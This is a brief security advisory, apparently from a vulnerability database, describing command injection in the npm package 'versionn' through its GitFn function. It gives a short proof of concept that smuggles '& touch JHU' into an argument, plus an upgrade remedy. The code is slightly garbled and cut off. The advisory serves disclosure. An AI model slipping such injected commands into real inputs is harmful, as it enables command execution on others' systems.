Command Injection
Overview Affected versions of this package are vulnerable to Command Injection due to improper input sanitization in the 'GitFn.prototype' function. PoC javascript var root = require"versionn" var b = new root..GitFn"& touch JHU",dir:"./" b.tagfunction Remediation Upgrade versionn to version 1.1....